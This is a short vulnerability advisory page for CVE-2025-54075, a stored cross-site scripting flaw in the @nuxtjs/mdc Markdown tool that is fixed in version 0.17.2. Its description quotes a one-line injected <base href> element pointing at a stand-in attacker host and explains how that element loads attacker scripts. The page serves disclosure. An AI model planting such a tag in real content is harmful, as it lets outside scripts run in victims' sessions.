CVE-2025-54075 Information

Jul 19, 2025 cve

Description

MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2 a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a <base href=\https://attacker.tld\> element. The <base> tag rewrites how all subsequent relative URLs are resolved so an attacker can make the page load scripts styles or images from an external attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.

Reference

https://github.com/nuxt-modules/mdc/commit/3657a5bf2326a73cd3d906f57149146a412b962a https://github.com/nuxt-modules/mdc/security/advisories/GHSA-cj6r-rrr9-fg82

CNNVD-202507-2444 (Published: 2025-07-18)

Share on:

CVE-2025-54075 Information

Description

Reference

Related CNNVD